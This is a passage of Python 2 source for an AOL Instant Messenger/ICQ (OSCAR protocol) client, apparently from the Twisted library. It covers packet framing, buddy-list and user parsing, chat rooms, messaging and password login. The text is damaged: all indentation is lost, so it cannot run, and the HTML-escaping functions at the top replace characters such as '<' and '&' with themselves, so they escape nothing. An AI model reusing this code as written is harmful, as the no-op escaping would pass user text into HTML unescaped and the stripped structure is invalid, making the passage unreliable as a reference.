text=string.replace(text,'&','&')
return text
def html(text):
text=string.replace(text,'"','"')
text=string.replace(text,'&','&')
text=string.replace(text,'<','<')
text=string.replace(text,'>','>')
text=string.replace(text,"\n","<br>")
return '<html><body bgcolor="white"><font color="black">%s</font></body></html>'%text
class OSCARUser:
def __init__(self, name, warn, tlvs):
self.name = name
self.warning = warn
self.flags = []
self.caps = []
for k,v in tlvs.items():
if k == 1: # user flags
v=struct.unpack('!H',v)[0]
for o, f in [(1,'trial'),
(2,'unknown bit 2'),
(4,'aol'),
(8,'unknown bit 4'),
(16,'aim'),
(32,'away'),
(1024,'activebuddy')]:
if v&o: self.flags.append(f)
elif k == 2: # member since date
self.memberSince = struct.unpack('!L',v)[0]
elif k == 3: # on-since
self.onSince = struct.unpack('!L',v)[0]
elif k == 4: # idle time
self.idleTime = struct.unpack('!H',v)[0]
elif k == 5: # unknown
pass
elif k == 6: # icq online status
if v[2] == '\x00':
self.icqStatus = 'online'
elif v[2] == '\x01':
self.icqStatus = 'away'
elif v[2] == '\x02':
self.icqStatus = 'dnd'
elif v[2] == '\x04':
self.icqStatus = 'out'
elif v[2] == '\x10':
self.icqStatus = 'busy'
else:
self.icqStatus = 'unknown'
elif k == 10: # icq ip address
self.icqIPaddy = socket.inet_ntoa(v)
elif k == 12: # icq random stuff
self.icqRandom = v
elif k == 13: # capabilities
caps=[]
while v:
c=v[:16]
if c==CAP_ICON: caps.append("icon")
elif c==CAP_IMAGE: caps.append("image")
elif c==CAP_VOICE: caps.append("voice")
elif c==CAP_CHAT: caps.append("chat")
elif c==CAP_GET_FILE: caps.append("getfile")
elif c==CAP_SEND_FILE: caps.append("sendfile")
elif c==CAP_SEND_LIST: caps.append("sendlist")
elif c==CAP_GAMES: caps.append("games")
else: caps.append(("unknown",c))
v=v[16:]
caps.sort()
self.caps=caps
elif k == 14: pass
elif k == 15: # session length (aim)
self.sessionLength = struct.unpack('!L',v)[0]
elif k == 16: # session length (aol)
self.sessionLength = struct.unpack('!L',v)[0]
elif k == 30: # no idea
pass
else:
log.msg("unknown tlv for user %s\nt: %s\nv: %s"%(self.name,k,repr(v)))
def __str__(self):
s = '<OSCARUser %s' % self.name
o = []
if self.warning!=0: o.append('warning level %s'%self.warning)
if hasattr(self, 'flags'): o.append('flags %s'%self.flags)
if hasattr(self, 'sessionLength'): o.append('online for %i minutes' % (self.sessionLength/60,))
if hasattr(self, 'idleTime'): o.append('idle for %i minutes' % self.idleTime)
if self.caps: o.append('caps %s'%self.caps)
if o:
s=s+', '+', '.join(o)
s=s+'>'
return s
class SSIGroup:
def __init__(self, name, tlvs = {}):
self.name = name
#self.tlvs = []
#self.userIDs = []
self.usersToID = {}
self.users = []
#if not tlvs.has_key(0xC8): return
#buddyIDs = tlvs[0xC8]
#while buddyIDs:
# bid = struct.unpack('!H',buddyIDs[:2])[0]
# buddyIDs = buddyIDs[2:]
# self.users.append(bid)
def findIDFor(self, user):
return self.usersToID[user]
def addUser(self, buddyID, user):
self.usersToID[user] = buddyID
self.users.append(user)
user.group = self
def oscarRep(self, groupID, buddyID):
tlvData = TLV(0xc8, reduce(lambda x,y:x+y, [struct.pack('!H',self.usersToID[x]) for x in self.users]))
return struct.pack('!H', len(self.name)) + self.name + \
struct.pack('!HH', groupID, buddyID) + '\000\001' + tlvData
class SSIBuddy:
def __init__(self, name, tlvs = {}):
self.name = name
self.tlvs = tlvs
for k,v in tlvs.items():
if k == 0x013c: # buddy comment
self.buddyComment = v
elif k == 0x013d: # buddy alerts
actionFlag = ord(v[0])
whenFlag = ord(v[1])
self.alertActions = []
self.alertWhen = []
if actionFlag&1:
self.alertActions.append('popup')
if actionFlag&2:
self.alertActions.append('sound')
if whenFlag&1:
self.alertWhen.append('online')
if whenFlag&2:
self.alertWhen.append('unidle')
if whenFlag&4:
self.alertWhen.append('unaway')
elif k == 0x013e:
self.alertSound = v
def oscarRep(self, groupID, buddyID):
tlvData = reduce(lambda x,y: x+y, map(lambda (k,v):TLV(k,v), self.tlvs.items()), '\000\000')
return struct.pack('!H', len(self.name)) + self.name + \
struct.pack('!HH', groupID, buddyID) + '\000\000' + tlvData
class OscarConnection(protocol.Protocol):
def connectionMade(self):
self.state=""
self.seqnum=0
self.buf=''
self.stopKeepAliveID = None
self.setKeepAlive(4*60) # 4 minutes
def connectionLost(self, reason):
log.msg("Connection Lost! %s" % self)
self.stopKeepAlive()
# def connectionFailed(self):
# log.msg("Connection Failed! %s" % self)
# self.stopKeepAlive()
def sendFLAP(self,data,channel = 0x02):
header="!cBHH"
self.seqnum=(self.seqnum+1)%0xFFFF
seqnum=self.seqnum
head=struct.pack(header,'*', channel,
seqnum, len(data))
self.transport.write(head+str(data))
# if isinstance(self, ChatService):
# logPacketData(head+str(data))
def readFlap(self):
header="!cBHH"
if len(self.buf)<6: return
flap=struct.unpack(header,self.buf[:6])
if len(self.buf)<6+flap[3]: return
data,self.buf=self.buf[6:6+flap[3]],self.buf[6+flap[3]:]
return [flap[1],data]
def dataReceived(self,data):
# if isinstance(self, ChatService):
# logPacketData(data)
self.buf=self.buf+data
flap=self.readFlap()
while flap:
func=getattr(self,"oscar_%s"%self.state,None)
if not func:
log.msg("no func for state: %s" % self.state)
state=func(flap)
if state:
self.state=state
flap=self.readFlap()
def setKeepAlive(self,t):
self.keepAliveDelay=t
self.stopKeepAlive()
self.stopKeepAliveID = reactor.callLater(t, self.sendKeepAlive)
def sendKeepAlive(self):
self.sendFLAP("",0x05)
self.stopKeepAliveID = reactor.callLater(self.keepAliveDelay, self.sendKeepAlive)
def stopKeepAlive(self):
if self.stopKeepAliveID:
self.stopKeepAliveID.cancel()
self.stopKeepAliveID = None
def disconnect(self):
"""
send the disconnect flap, and sever the connection
"""
self.sendFLAP('', 0x04)
def f(reason): pass
self.connectionLost = f
self.transport.loseConnection()
class SNACBased(OscarConnection):
snacFamilies = {
# family : (version, toolID, toolVersion)
}
def __init__(self,cookie):
self.cookie=cookie
self.lastID=0
self.supportedFamilies = ()
self.requestCallbacks={} # request id:Deferred
def sendSNAC(self,fam,sub,data,flags=[0,0]):
"""
send a snac and wait for the response by returning a Deferred.
"""
reqid=self.lastID
self.lastID=reqid+1
d = defer.Deferred()
d.reqid = reqid
#d.addErrback(self._ebDeferredError,fam,sub,data) # XXX for testing
self.requestCallbacks[reqid] = d
self.sendFLAP(SNAC(fam,sub,reqid,data))
return d
def _ebDeferredError(self, error, fam, sub, data):
log.msg('ERROR IN DEFERRED %s' % error)
log.msg('on sending of message, family 0x%02x, subtype 0x%02x' % (fam, sub))
log.msg('data: %s' % repr(data))
def sendSNACnr(self,fam,sub,data,flags=[0,0]):
"""
send a snac, but don't bother adding a deferred, we don't care.
"""
self.sendFLAP(SNAC(fam,sub,0x10000*fam+sub,data))
def oscar_(self,data):
self.sendFLAP("\000\000\000\001"+TLV(6,self.cookie), 0x01)
return "Data"
def oscar_Data(self,data):
snac=readSNAC(data[1])
if self.requestCallbacks.has_key(snac[4]):
d = self.requestCallbacks[snac[4]]
del self.requestCallbacks[snac[4]]
if snac[1]!=1:
d.callback(snac)
else:
d.errback(snac)
return
func=getattr(self,'oscar_%02X_%02X'%(snac[0],snac[1]),None)
if not func:
self.oscar_unknown(snac)
else:
func(snac[2:])
return "Data"
def oscar_unknown(self,snac):
log.msg("unknown for %s" % self)
log.msg(snac)
def oscar_01_03(self, snac):
numFamilies = len(snac[3])/2
self.supportedFamilies = struct.unpack("!"+str(numFamilies)+'H', snac[3])
d = ''
for fam in self.supportedFamilies:
if self.snacFamilies.has_key(fam):
d=d+struct.pack('!2H',fam,self.snacFamilies[fam][0])
self.sendSNACnr(0x01,0x17, d)
def oscar_01_0A(self,snac):
"""
change of rate information.
"""
# this can be parsed, maybe we can even work it in
pass
def oscar_01_18(self,snac):
"""
host versions, in the same format as we sent
"""
self.sendSNACnr(0x01,0x06,"") #pass
def clientReady(self):
"""
called when the client is ready to be online
"""
d = ''
for fam in self.supportedFamilies:
if self.snacFamilies.has_key(fam):
version, toolID, toolVersion = self.snacFamilies[fam]
d = d + struct.pack('!4H',fam,version,toolID,toolVersion)
self.sendSNACnr(0x01,0x02,d)
class BOSConnection(SNACBased):
snacFamilies = {
0x01:(3, 0x0110, 0x059b),
0x13:(3, 0x0110, 0x059b),
0x02:(1, 0x0110, 0x059b),
0x03:(1, 0x0110, 0x059b),
0x04:(1, 0x0110, 0x059b),
0x06:(1, 0x0110, 0x059b),
0x08:(1, 0x0104, 0x0001),
0x09:(1, 0x0110, 0x059b),
0x0a:(1, 0x0110, 0x059b),
0x0b:(1, 0x0104, 0x0001),
0x0c:(1, 0x0104, 0x0001)
}
capabilities = None
def __init__(self,username,cookie):
SNACBased.__init__(self,cookie)
self.username=username
self.profile = None
self.awayMessage = None
self.services = {}
if not self.capabilities:
self.capabilities = [CAP_CHAT]
def parseUser(self,data,count=None):
l=ord(data[0])
name=data[1:1+l]
warn,foo=struct.unpack("!HH",data[1+l:5+l])
warn=int(warn/10)
tlvs=data[5+l:]
if count:
tlvs,rest = readTLVs(tlvs,foo)
else:
tlvs,rest = readTLVs(tlvs), None
u = OSCARUser(name, warn, tlvs)
if rest == None:
return u
else:
return u, rest
def oscar_01_05(self, snac, d = None):
"""
data for a new service connection
d might be a deferred to be called back when the service is ready
"""
tlvs = readTLVs(snac[3][2:])
service = struct.unpack('!H',tlvs[0x0d])[0]
ip = tlvs[5]
cookie = tlvs[6]
#c = serviceClasses[service](self, cookie, d)
c = protocol.ClientCreator(reactor, serviceClasses[service], self, cookie, d)
def addService(x):
self.services[service] = x
c.connectTCP(ip, 5190).addCallback(addService)
#self.services[service] = c
def oscar_01_07(self,snac):
"""
        rate parameters
"""
self.sendSNACnr(0x01,0x08,"\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05") # ack
self.initDone()
self.sendSNACnr(0x13,0x02,'') # SSI rights info
self.sendSNACnr(0x02,0x02,'') # location rights info
self.sendSNACnr(0x03,0x02,'') # buddy list rights
self.sendSNACnr(0x04,0x04,'') # ICBM parms
self.sendSNACnr(0x09,0x02,'') # BOS rights
def oscar_01_10(self,snac):
"""
we've been warned
"""
skip = struct.unpack('!H',snac[3][:2])[0]
newLevel = struct.unpack('!H',snac[3][2+skip:4+skip])[0]/10
if len(snac[3])>4+skip:
by = self.parseUser(snac[3][4+skip:])
else:
by = None
self.receiveWarning(newLevel, by)
def oscar_01_13(self,snac):
"""
MOTD
"""
pass # we don't care for now
def oscar_02_03(self, snac):
"""
location rights response
"""
tlvs = readTLVs(snac[3])
self.maxProfileLength = tlvs[1]
def oscar_03_03(self, snac):
"""
buddy list rights response
"""
tlvs = readTLVs(snac[3])
self.maxBuddies = tlvs[1]
self.maxWatchers = tlvs[2]
def oscar_03_0B(self, snac):
"""
buddy update
"""
self.updateBuddy(self.parseUser(snac[3]))
def oscar_03_0C(self, snac):
"""
buddy offline
"""
self.offlineBuddy(self.parseUser(snac[3]))
# def oscar_04_03(self, snac):
def oscar_04_05(self, snac):
"""
ICBM parms response
"""
self.sendSNACnr(0x04,0x02,'\x00\x00\x00\x00\x00\x0b\x1f@\x03\xe7\x03\xe7\x00\x00\x00\x00') # IM rights
def oscar_04_07(self, snac):
"""
ICBM message (instant message)
"""
data = snac[3]
cookie, data = data[:8], data[8:]
channel = struct.unpack('!H',data[:2])[0]
data = data[2:]
user, data = self.parseUser(data, 1)
tlvs = readTLVs(data)
if channel == 1: # message
flags = []
multiparts = []
for k, v in tlvs.items():
if k == 2:
while v:
v = v[2:] # skip bad data
messageLength, charSet, charSubSet = struct.unpack('!3H', v[:6])
messageLength -= 4
message = [v[6:6+messageLength]]
if charSet == 0:
pass # don't add anything special
elif charSet == 2:
message.append('unicode')
elif charSet == 3:
message.append('iso-8859-1')
elif charSet == 0xffff:
message.append('none')
if charSubSet == 0xb:
message.append('macintosh')
if messageLength > 0: multiparts.append(tuple(message))
v = v[6+messageLength:]
elif k == 3:
flags.append('acknowledge')
elif k == 4:
flags.append('auto')
elif k == 6:
flags.append('offline')
elif k == 8:
iconLength, foo, iconSum, iconStamp = struct.unpack('!LHHL',v)
if iconLength:
flags.append('icon')
flags.append((iconLength, iconSum, iconStamp))
elif k == 9:
flags.append('buddyrequest')
elif k == 0xb: # unknown
pass
elif k == 0x17:
flags.append('extradata')
flags.append(v)
else:
log.msg('unknown TLV for incoming IM, %04x, %s' % (k,repr(v)))
# unknown tlv for user SNewdorf
# t: 29
# v: '\x00\x00\x00\x05\x02\x01\xd2\x04r\x00\x01\x01\x10/\x8c\x8b\x8a\x1e\x94*\xbc\x80}\x8d\xc4;\x1dEM'
# XXX what is this?
self.receiveMessage(user, multiparts, flags)
        elif channel == 2: # rendezvous
status = struct.unpack('!H',tlvs[5][:2])[0]
requestClass = tlvs[5][10:26]
moreTLVs = readTLVs(tlvs[5][26:])
if requestClass == CAP_CHAT: # a chat request
exchange = struct.unpack('!H',moreTLVs[10001][:2])[0]
name = moreTLVs[10001][3:-2]
instance = struct.unpack('!H',moreTLVs[10001][-2:])[0]
if not self.services.has_key(SERVICE_CHATNAV):
self.connectService(SERVICE_CHATNAV,1).addCallback(lambda x: self.services[SERVICE_CHATNAV].getChatInfo(exchange, name, instance).\
addCallback(self._cbGetChatInfoForInvite, user, moreTLVs[12]))
else:
self.services[SERVICE_CHATNAV].getChatInfo(exchange, name, instance).\
addCallback(self._cbGetChatInfoForInvite, user, moreTLVs[12])
elif requestClass == CAP_SEND_FILE:
if moreTLVs.has_key(11): # cancel
log.msg('cancelled file request')
log.msg(status)
return # handle this later
name = moreTLVs[10001][9:-7]
desc = moreTLVs[12]
log.msg('file request from %s, %s, %s' % (user, name, desc))
self.receiveSendFileRequest(user, name, desc, cookie)
else:
                log.msg('unsupported rendezvous: %s' % requestClass)
log.msg(repr(moreTLVs))
else:
log.msg('unknown channel %02x' % channel)
log.msg(tlvs)
def _cbGetChatInfoForInvite(self, info, user, message):
apply(self.receiveChatInvite, (user,message)+info)
def oscar_09_03(self, snac):
"""
BOS rights response
"""
tlvs = readTLVs(snac[3])
self.maxPermitList = tlvs[1]
self.maxDenyList = tlvs[2]
def oscar_0B_02(self, snac):
"""
stats reporting interval
"""
self.reportingInterval = struct.unpack('!H',snac[3][:2])[0]
def oscar_13_03(self, snac):
"""
SSI rights response
"""
#tlvs = readTLVs(snac[3])
pass # we don't know how to parse this
# methods to be called by the client, and their support methods
def requestSelfInfo(self):
"""
ask for the OSCARUser for ourselves
"""
d = defer.Deferred()
self.sendSNAC(0x01, 0x0E, '').addCallback(self._cbRequestSelfInfo, d)
return d
def _cbRequestSelfInfo(self, snac, d):
d.callback(self.parseUser(snac[5]))
def initSSI(self):
"""
this sends the rate request for family 0x13 (Server Side Information)
so we can then use it
"""
return self.sendSNAC(0x13, 0x02, '').addCallback(self._cbInitSSI)
    def _cbInitSSI(self, snac):
return {} # don't even bother parsing this
def requestSSI(self, timestamp = 0, revision = 0):
"""
request the server side information
if the deferred gets None, it means the SSI is the same
"""
return self.sendSNAC(0x13, 0x05,
struct.pack('!LH',timestamp,revision)).addCallback(self._cbRequestSSI)
def _cbRequestSSI(self, snac, args = ()):
if snac[1] == 0x0f: # same SSI as we have
return
itemdata = snac[5][3:]
if args:
revision, groups, permit, deny, permitMode, visibility = args
else:
version, revision = struct.unpack('!BH', snac[5][:3])
groups = {}
permit = []
deny = []
permitMode = None
visibility = None
while len(itemdata)>4:
nameLength = struct.unpack('!H', itemdata[:2])[0]
name = itemdata[2:2+nameLength]
groupID, buddyID, itemType, restLength = \
struct.unpack('!4H', itemdata[2+nameLength:10+nameLength])
tlvs = readTLVs(itemdata[10+nameLength:10+nameLength+restLength])
itemdata = itemdata[10+nameLength+restLength:]
if itemType == 0: # buddies
groups[groupID].addUser(buddyID, SSIBuddy(name, tlvs))
elif itemType == 1: # group
g = SSIGroup(name, tlvs)
if groups.has_key(0): groups[0].addUser(groupID, g)
groups[groupID] = g
elif itemType == 2: # permit
permit.append(name)
elif itemType == 3: # deny
deny.append(name)
elif itemType == 4: # permit deny info
if not tlvs.has_key(0xcb):
continue # this happens with ICQ
permitMode = {1:'permitall',2:'denyall',3:'permitsome',4:'denysome',5:'permitbuddies'}[ord(tlvs[0xca])]
visibility = {'\xff\xff\xff\xff':'all','\x00\x00\x00\x04':'notaim'}[tlvs[0xcb]]
elif itemType == 5: # unknown (perhaps idle data)?
pass
else:
log.msg('%s %s %s %s %s' % (name, groupID, buddyID, itemType, tlvs))
timestamp = struct.unpack('!L',itemdata)[0]
if not timestamp: # we've got more packets coming
# which means add some deferred stuff
d = defer.Deferred()
self.requestCallbacks[snac[4]] = d
d.addCallback(self._cbRequestSSI, (revision, groups, permit, deny, permitMode, visibility))
return d
return (groups[0].users,permit,deny,permitMode,visibility,timestamp,revision)
def activateSSI(self):
"""
        activate the data stored on the server (use buddy list, permit deny settings, etc.)
"""
self.sendSNACnr(0x13,0x07,'')
def startModifySSI(self):
"""
tell the OSCAR server to be on the lookout for SSI modifications
"""
self.sendSNACnr(0x13,0x11,'')
def addItemSSI(self, item, groupID = None, buddyID = None):
"""
add an item to the SSI server. if buddyID == 0, then this should be a group.
this gets a callback when it's finished, but you can probably ignore it.
"""
if groupID is None:
if isinstance(item, SSIGroup):
groupID = 0
else:
groupID = item.group.group.findIDFor(item.group)
if buddyID is None:
buddyID = item.group.findIDFor(item)
return self.sendSNAC(0x13,0x08, item.oscarRep(groupID, buddyID))
def modifyItemSSI(self, item, groupID = None, buddyID = None):
if groupID is None:
if isinstance(item, SSIGroup):
groupID = 0
else:
groupID = item.group.group.findIDFor(item.group)
if buddyID is None:
buddyID = item.group.findIDFor(item)
return self.sendSNAC(0x13,0x09, item.oscarRep(groupID, buddyID))
def delItemSSI(self, item, groupID = None, buddyID = None):
if groupID is None:
if isinstance(item, SSIGroup):
groupID = 0
else:
groupID = item.group.group.findIDFor(item.group)
if buddyID is None:
buddyID = item.group.findIDFor(item)
return self.sendSNAC(0x13,0x0A, item.oscarRep(groupID, buddyID))
def endModifySSI(self):
self.sendSNACnr(0x13,0x12,'')
def setProfile(self, profile):
"""
set the profile.
send None to not set a profile (different from '' for a blank one)
"""
self.profile = profile
tlvs = ''
if self.profile is not None:
tlvs = TLV(1,'text/aolrtf; charset="us-ascii"') + \
TLV(2,self.profile)
tlvs = tlvs + TLV(5, ''.join(self.capabilities))
self.sendSNACnr(0x02, 0x04, tlvs)
def setAway(self, away = None):
"""
set the away message, or return (if away == None)
"""
self.awayMessage = away
tlvs = TLV(3,'text/aolrtf; charset="us-ascii"') + \
TLV(4,away or '')
self.sendSNACnr(0x02, 0x04, tlvs)
def setIdleTime(self, idleTime):
"""
set our idle time. don't call more than once with a non-0 idle time.
"""
self.sendSNACnr(0x01, 0x11, struct.pack('!L',idleTime))
def sendMessage(self, user, message, wantAck = 0, autoResponse = 0, offline = 0 ): \
#haveIcon = 0, ):
"""
        send a message to user (not an OSCARUser).
message can be a string, or a multipart tuple.
if wantAck, we return a Deferred that gets a callback when the message is sent.
if autoResponse, this message is an autoResponse, as if from an away message.
if offline, this is an offline message (ICQ only, I think)
"""
data = ''.join([chr(random.randrange(0, 127)) for i in range(8)]) # cookie
data = data + '\x00\x01' + chr(len(user)) + user
if not type(message) in (types.TupleType, types.ListType):
message = [[message,]]
if type(message[0][0]) == types.UnicodeType:
message[0].append('unicode')
messageData = ''
for part in message:
charSet = 0
if 'unicode' in part[1:]:
charSet = 2
part[0] = part[0].encode('utf-8')
elif 'iso-8859-1' in part[1:]:
charSet = 3
part[0] = part[0].encode('iso-8859-1')
elif 'none' in part[1:]:
charSet = 0xffff
if 'macintosh' in part[1:]:
charSubSet = 0xb
else:
charSubSet = 0
messageData = messageData + '\x01\x01' + \
struct.pack('!3H',len(part[0])+4,charSet,charSubSet)
messageData = messageData + part[0]
data = data + TLV(2, '\x05\x01\x00\x03\x01\x01\x02'+messageData)
if wantAck:
data = data + TLV(3,'')
if autoResponse:
data = data + TLV(4,'')
if offline:
data = data + TLV(6,'')
if wantAck:
return self.sendSNAC(0x04, 0x06, data).addCallback(self._cbSendMessageAck, user, message)
self.sendSNACnr(0x04, 0x06, data)
def _cbSendMessageAck(self, snac, user, message):
return user, message
def connectService(self, service, wantCallback = 0, extraData = ''):
"""
connect to another service
if wantCallback, we return a Deferred that gets called back when the service is online.
if extraData, append that to our request.
"""
if wantCallback:
d = defer.Deferred()
self.sendSNAC(0x01,0x04,struct.pack('!H',service) + extraData).addCallback(self._cbConnectService, d)
return d
else:
self.sendSNACnr(0x01,0x04,struct.pack('!H',service))
def _cbConnectService(self, snac, d):
self.oscar_01_05(snac[2:], d)
def createChat(self, shortName):
"""
create a chat room
"""
if self.services.has_key(SERVICE_CHATNAV):
return self.services[SERVICE_CHATNAV].createChat(shortName)
else:
return self.connectService(SERVICE_CHATNAV,1).addCallback(lambda s: s.createChat(shortName))
def joinChat(self, exchange, fullName, instance):
"""
join a chat room
"""
#d = defer.Deferred()
return self.connectService(0x0e, 1, TLV(0x01, struct.pack('!HB',exchange, len(fullName)) + fullName +
struct.pack('!H', instance))).addCallback(self._cbJoinChat) #, d)
#return d
def _cbJoinChat(self, chat):
del self.services[SERVICE_CHAT]
return chat
def warnUser(self, user, anon = 0):
return self.sendSNAC(0x04, 0x08, '\x00'+chr(anon)+chr(len(user))+user).addCallback(self._cbWarnUser)
def _cbWarnUser(self, snac):
oldLevel, newLevel = struct.unpack('!2H', snac[5])
return oldLevel, newLevel
def getInfo(self, user):
#if user.
return self.sendSNAC(0x02, 0x05, '\x00\x01'+chr(len(user))+user).addCallback(self._cbGetInfo)
def _cbGetInfo(self, snac):
user, rest = self.parseUser(snac[5],1)
tlvs = readTLVs(rest)
return tlvs.get(0x02,None)
def getAway(self, user):
return self.sendSNAC(0x02, 0x05, '\x00\x03'+chr(len(user))+user).addCallback(self._cbGetAway)
def _cbGetAway(self, snac):
user, rest = self.parseUser(snac[5],1)
tlvs = readTLVs(rest)
return tlvs.get(0x04,None) # return None if there is no away message
#def acceptSendFileRequest(self,
# methods to be overriden by the client
def initDone(self):
"""
called when we get the rate information, which means we should do other init. stuff.
"""
log.msg('%s initDone' % self)
pass
def updateBuddy(self, user):
"""
called when a buddy changes status, with the OSCARUser for that buddy.
"""
log.msg('%s updateBuddy %s' % (self, user))
pass
def offlineBuddy(self, user):
"""
called when a buddy goes offline
"""
log.msg('%s offlineBuddy %s' % (self, user))
pass
def receiveMessage(self, user, multiparts, flags):
"""
called when someone sends us a message
"""
pass
def receiveWarning(self, newLevel, user):
"""
called when someone warns us.
user is either None (if it was anonymous) or an OSCARUser
"""
pass
def receiveChatInvite(self, user, message, exchange, fullName, instance, shortName, inviteTime):
"""
called when someone invites us to a chat room
"""
pass
def chatReceiveMessage(self, chat, user, message):
"""
called when someone in a chatroom sends us a message in the chat
"""
pass
def chatMemberJoined(self, chat, member):
"""
called when a member joins the chat
"""
pass
def chatMemberLeft(self, chat, member):
"""
called when a member leaves the chat
"""
pass
def receiveSendFileRequest(self, user, file, description, cookie):
"""
called when someone tries to send a file to us
"""
pass
class OSCARService(SNACBased):
def __init__(self, bos, cookie, d = None):
SNACBased.__init__(self, cookie)
self.bos = bos
self.d = d
def connectionLost(self, reason):
for k,v in self.bos.services.items():
if v == self:
del self.bos.services[k]
return
def clientReady(self):
SNACBased.clientReady(self)
if self.d:
self.d.callback(self)
self.d = None
class ChatNavService(OSCARService):
snacFamilies = {
0x01:(3, 0x0010, 0x059b),
0x0d:(1, 0x0010, 0x059b)
}
def oscar_01_07(self, snac):
# rate info
self.sendSNACnr(0x01, 0x08, '\000\001\000\002\000\003\000\004\000\005')
self.sendSNACnr(0x0d, 0x02, '')
def oscar_0D_09(self, snac):
self.clientReady()
def getChatInfo(self, exchange, name, instance):
d = defer.Deferred()
self.sendSNAC(0x0d,0x04,struct.pack('!HB',exchange,len(name)) + \
name + struct.pack('!HB',instance,2)). \
addCallback(self._cbGetChatInfo, d)
return d
def _cbGetChatInfo(self, snac, d):
data = snac[5][4:]
exchange, length = struct.unpack('!HB',data[:3])
fullName = data[3:3+length]
instance = struct.unpack('!H',data[3+length:5+length])[0]
tlvs = readTLVs(data[8+length:])
shortName = tlvs[0x6a]
inviteTime = struct.unpack('!L',tlvs[0xca])[0]
info = (exchange,fullName,instance,shortName,inviteTime)
d.callback(info)
def createChat(self, shortName):
#d = defer.Deferred()
data = '\x00\x04\x06create\xff\xff\x01\x00\x03'
data = data + TLV(0xd7, 'en')
data = data + TLV(0xd6, 'us-ascii')
data = data + TLV(0xd3, shortName)
return self.sendSNAC(0x0d, 0x08, data).addCallback(self._cbCreateChat)
#return d
def _cbCreateChat(self, snac): #d):
exchange, length = struct.unpack('!HB',snac[5][4:7])
fullName = snac[5][7:7+length]
instance = struct.unpack('!H',snac[5][7+length:9+length])[0]
#d.callback((exchange, fullName, instance))
return exchange, fullName, instance
class ChatService(OSCARService):
snacFamilies = {
0x01:(3, 0x0010, 0x059b),
0x0E:(1, 0x0010, 0x059b)
}
def __init__(self,bos,cookie, d = None):
OSCARService.__init__(self,bos,cookie,d)
self.exchange = None
self.fullName = None
self.instance = None
self.name = None
self.members = None
clientReady = SNACBased.clientReady # we'll do our own callback
def oscar_01_07(self,snac):
self.sendSNAC(0x01,0x08,"\000\001\000\002\000\003\000\004\000\005")
self.clientReady()
def oscar_0E_02(self, snac):
# try: # this is EVIL
# data = snac[3][4:]
# self.exchange, length = struct.unpack('!HB',data[:3])
# self.fullName = data[3:3+length]
# self.instance = struct.unpack('!H',data[3+length:5+length])[0]
# tlvs = readTLVs(data[8+length:])
# self.name = tlvs[0xd3]
# self.d.callback(self)
# except KeyError:
data = snac[3]
self.exchange, length = struct.unpack('!HB',data[:3])
self.fullName = data[3:3+length]
self.instance = struct.unpack('!H',data[3+length:5+length])[0]
tlvs = readTLVs(data[8+length:])
self.name = tlvs[0xd3]
self.d.callback(self)
def oscar_0E_03(self,snac):
users=[]
rest=snac[3]
while rest:
user, rest = self.bos.parseUser(rest, 1)
users.append(user)
if not self.fullName:
self.members = users
else:
self.members.append(users[0])
self.bos.chatMemberJoined(self,users[0])
def oscar_0E_04(self,snac):
user=self.bos.parseUser(snac[3])
for u in self.members:
if u.name == user.name: # same person!
self.members.remove(u)
self.bos.chatMemberLeft(self,user)
def oscar_0E_06(self,snac):
data = snac[3]
user,rest=self.bos.parseUser(snac[3][14:],1)
tlvs = readTLVs(rest[8:])
message=tlvs[1]
self.bos.chatReceiveMessage(self,user,message)
def sendMessage(self,message):
tlvs=TLV(0x02,"us-ascii")+TLV(0x03,"en")+TLV(0x01,message)
self.sendSNAC(0x0e,0x05,
"\x46\x30\x38\x30\x44\x00\x63\x00\x00\x03\x00\x01\x00\x00\x00\x06\x00\x00\x00\x05"+
struct.pack("!H",len(tlvs))+
tlvs)
def leaveChat(self):
self.disconnect()
class OscarAuthenticator(OscarConnection):
BOSClass = BOSConnection
def __init__(self,username,password,deferred=None,icq=0):
self.username=username
self.password=password
self.deferred=deferred
self.icq=icq # icq mode is disabled
#if icq and self.BOSClass==BOSConnection:
# self.BOSClass=ICQConnection
def oscar_(self,flap):
if not self.icq:
self.sendFLAP("\000\000\000\001", 0x01)
self.sendFLAP(SNAC(0x17,0x06,0,
TLV(TLV_USERNAME,self.username)+
TLV(0x004B,'')))
self.state="Key"
else:
encpass=encryptPasswordICQ(self.password)
self.sendFLAP('\000\000\000\001'+
TLV(0x01,self.username)+
TLV(0x02,encpass)+
TLV(0x03,'ICQ Inc. - Product of ICQ (TM).2001b.5.18.1.3659.85')+
TLV(0x16,"\x01\x0a")+
TLV(0x17,"\x00\x05")+
TLV(0x18,"\x00\x12")+
TLV(0x19,"\000\001")+
TLV(0x1a,"\x0eK")+
TLV(0x14,"\x00\x00\x00U")+
TLV(0x0f,"en")+
TLV(0x0e,"us"),0x01)
self.state="Cookie"
def oscar_Key(self,data):
snac=readSNAC(data[1])
key=snac[5][2:]
encpass=encryptPasswordMD5(self.password,key)
self.sendFLAP(SNAC(0x17,0x02,0,
TLV(TLV_USERNAME,self.username)+
TLV(TLV_PASSWORD,encpass)+
TLV(0x004C, '')+ # unknown
TLV(TLV_CLIENTNAME,"AOL Instant Messenger (SM), version 4.8.2790/WIN32")+
TLV(0x0016,"\x01\x09")+
TLV(TLV_CLIENTMAJOR,"\000\004")+
TLV(TLV_CLIENTMINOR,"\000\010")+
TLV(0x0019,"\000\000")+
TLV(TLV_CLIENTSUB,"\x0A\xE6")+
TLV(0x0014,"\x00\x00\x00\xBB")+
TLV(TLV_LANG,"en")+
TLV(TLV_COUNTRY,"us")+
TLV(TLV_USESSI,"\001")))
return "Cookie"
def oscar_Cookie(self,data):
snac=readSNAC(data[1])
if self.icq:
i=snac[5].find("\000")
snac[5]=snac[5][i:]
tlvs=readTLVs(snac[5])
if tlvs.has_key(6):
self.cookie=tlvs[6]
server,port=string.split(tlvs[5],":")
d = self.connectToBOS(server, int(port))
d.addErrback(lambda x: log.msg("Connection Failed! Reason: %s" % x))
if self.deferred:
d.chainDeferred(self.deferred)
self.disconnect()
elif tlvs.has_key(8):
errorcode=tlvs[8]
errorurl=tlvs[4]
if errorcode=='\000\030':
error="You are attempting to sign on again too soon. Please try again later."
elif errorcode=='\000\005':
error="Invalid Username or Password."
else: error=repr(errorcode)
self.error(error,errorurl)
else:
log.msg('hmm, weird tlvs for %s cookie packet' % str(self))
log.msg(tlvs)
log.msg('snac')
log.msg(str(snac))
return "None"
def oscar_None(self,data): pass
def connectToBOS(self, server, port):
c = protocol.ClientCreator(reactor, self.BOSClass, self.username, self.cookie)
return c.connectTCP(server, int(port))
def error(self,error,url):
log.msg("ERROR! %s %s" % (error,url))
